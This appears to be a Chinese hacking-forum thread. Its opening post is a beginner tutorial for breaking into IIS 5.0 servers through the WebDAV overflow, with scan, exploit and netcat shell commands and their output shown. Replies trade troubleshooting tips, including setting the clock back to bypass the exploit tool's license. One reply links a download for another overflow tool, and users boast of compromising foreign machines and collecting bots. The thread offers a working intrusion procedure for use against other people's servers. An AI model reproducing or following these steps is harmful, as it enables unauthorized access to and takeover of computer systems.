论坛: 菜鸟乐园 标题: 想成为黑客的菜鸟先到这来看看(基础篇:利用Webdav漏洞入侵) 复制本贴地址    
作者: BearKing [bking]    版主   登录
先用      WebdavScan      扫描一下,如果发现:
192.168.0.1  Microsoft-IIS/5.0  Enable 表示这个服务器存在Webdav漏洞。接下来就:
C:\>ping 192.168.0.1      /*如果对方没装防火墙,那你80%会成功*/
C:\>    webdavx3       192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
waiting for iis restart....................... (IIS在这里重起了,等一会)
try offset: 11
waiting for iis restart....................... (IIS在这里重起了,等一会)
try offset: 12   (程序运行到这里停顿下来了,如果停顿时间比较长都没有反应,就按Ctrl+C,然后连上目标的7788端口去)
^C
C:\>      nc       -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32> /*OK,成功获得了一个shell*/







[此贴被 BearKing(bking) 在 05月07日11时59分 编辑过]


[此贴被 BearKing(bking) 在 05月23日17时58分 编辑过]

地主 发表时间: 05/03 08:39

回复: cwenqiang [cwenqiang]   论坛用户   登录
nc -vv这里的vv是什么意思?


B1层 发表时间: 05/03 08:56

回复: BearKing [bking]   版主   登录
-v  详细输出――用两个-v可得到更详细的内容             

B2层 发表时间: 05/03 09:06

回复: ycjzg [ycjzg]   论坛用户   登录
你的方法在XP上行的通吗?IIS5。1

B3层 发表时间: 05/03 09:24

回复: BearKing [bking]   版主   登录
你去试试不就得了!方法都已经告诉你们了,行不行还得看你自己.


[此贴被 BearKing(bking) 在 05月03日09时17分 编辑过]

B4层 发表时间: 05/03 09:29

回复: cmpfix [cmpfix]   论坛用户   登录
请问出现这种情况是什么原因?
This application has been generated with an evaluation license of the PerlApp utility. The evaluation license has expired now. Please contact the author of this application for a non-expiring version of the program: yan xue <isno@hacker.com.cn>.


B5层 发表时间: 05/03 10:15

回复: heiyeluren [heiyeluren]   论坛用户   登录
再5.1下是可以行的通的,因为WEBDAV漏洞中已经说明了它影响打了SP3的win2K和iis5.1

B6层 发表时间: 05/03 10:19

回复: BearKing [bking]   版主   登录
那是webdavx3过期了,你把系统时间设为2002.12就可以用了


[此贴被 BearKing(bking) 在 05月03日10时45分 编辑过]

B7层 发表时间: 05/03 10:35

回复: i1u [i1u]   论坛用户   登录
对啊 我也是出现一段英文,不行啊 是为什么啊?!

B8层 发表时间: 05/03 10:46

回复: BearKing [bking]   版主   登录
那是webdavx3过期了,你把系统时间设为2002.12就可以用了

B9层 发表时间: 05/03 11:55

回复: aa11 [aa11]   论坛用户   登录
我有个朋友还搞了个繁体的溢出工具~



B10层 发表时间: 05/03 14:13

回复: BearKing [bking]   版主   登录
你有吗?发给我好吗?

B11层 发表时间: 05/03 14:19

回复: lukaifeng [lukaifeng]   论坛用户   登录
NC是个什么东西,是不是一个木马?

B12层 发表时间: 05/03 14:49

回复: aa11 [aa11]   论坛用户   登录
我肯定有啦`

不过我没太出溢出~

溢出了几台台湾的~

呵呵~

意大利的我就没去搞了`

我那个朋友全世界跑~

不知道他下哪的~

具说是国外站点的~

我鹰文~~~~~~~~~


5555555555555~

B13层 发表时间: 05/05 07:53

回复: qinsheng [qinsheng]   论坛用户   登录
妈的 我这里怎么出了第一行的
try offset:0
就没反应了。是不是因为我用小猫上太慢了?

B14层 发表时间: 05/05 23:02

回复: fangua [fangua]   论坛用户   登录
我试过几个有此漏洞的,怎么就不会停下来的,有什么绝招吗~

B15层 发表时间: 05/06 12:47

回复: aa11 [aa11]   论坛用户   登录
你管它停不停,

另开个窗口,

telnet ip 7788

上去了就成~

没上去再试~

B16层 发表时间: 05/06 13:25

回复: aa11 [aa11]   论坛用户   登录
繁体版~~
http://61.132.55.71:9995/down/show.asp?id=3427



B17层 发表时间: 05/06 13:37

回复: marnudt [marnudt]   论坛用户   登录
这种方法好象不是很好用,成功率也不是很高

B18层 发表时间: 05/06 16:21

回复: drckness [drckness]   论坛用户   登录
E:\hacktools\WebDavKit\WebDavKit\Exploit>nc -vv 
444.444.444.444 7788
: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [63.99.209.120] 7788 (?): connection refused
sent 0, rcvd 0: NOTSOCK
我拷总是不能成攻晕

B19层 发表时间: 05/06 16:52

回复: nothing [eson]   论坛用户   登录
i succeed too.

B20层 发表时间: 05/06 17:54

回复: best_lu [best_lu]   论坛用户   登录
各位老大,如果主机有防火墙如何应付?现在很少服务器没有防火墙.

B21层 发表时间: 05/07 08:49

回复: linfish1 [linfish1]   论坛用户   登录
webdavx3 在哪下啊 怎么都是原代码啊 怎么用 

B22层 发表时间: 05/07 09:32

回复: leisure [leisure]   论坛用户   登录
是啊,知道了源代码怎么弄啊,是在c++里吗?往哪里填啊?

B23层 发表时间: 05/07 10:26

回复: xccom [xccom]   论坛用户   登录
我用那个BIG5 IP得到提示
....
Couldn't connect: IO::Socket::INET: connect: Unknown error!
针对好几个2000server的服务都是这样的...我应该接着怎么做?

B24层 发表时间: 05/07 11:10

回复: easyfly [easyfly]   论坛用户   登录
请问对英文版win2000能不能成功

B25层 发表时间: 05/09 20:26

回复: baby [sexfantasy]   论坛用户   登录
请问NC在哪里有下载啊?

B26层 发表时间: 05/10 04:23

回复: vishx [vishx]   论坛用户   登录
黑客防线上有嘛

B27层 发表时间: 05/10 09:26

回复: feile [feile]   论坛用户   登录
好像对XP无郊

B28层 发表时间: 05/11 10:12

回复: iqst [iqst]   论坛用户   登录
1 教程写的不敢恭维
2 只对win2000有效,nt,xp不行
3 iis若未重起,溢出就不成功

B29层 发表时间: 08/03 20:41

回复: yyf0322 [yyf0322]   论坛用户   登录
我觉得好象也是!

B30层 发表时间: 08/03 21:00

回复: junjuntop [junjuntop]   论坛用户   登录
扫3389 
再溢出
得肉

B31层 发表时间: 08/03 22:18

回复: hacker521 [hacker521]   论坛用户   登录
哈哈,BearKing ,这篇不就是俺提交的帖子吗,我还以为被老大枪毙了,怎么给你帖出来了

B32层 发表时间: 08/04 08:50

回复: ddy328 [ddy328]   论坛用户   登录
WebDAVScan 这个软件不回用怎么办?我是个菜鸟。



B33层 发表时间: 08/04 16:13

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号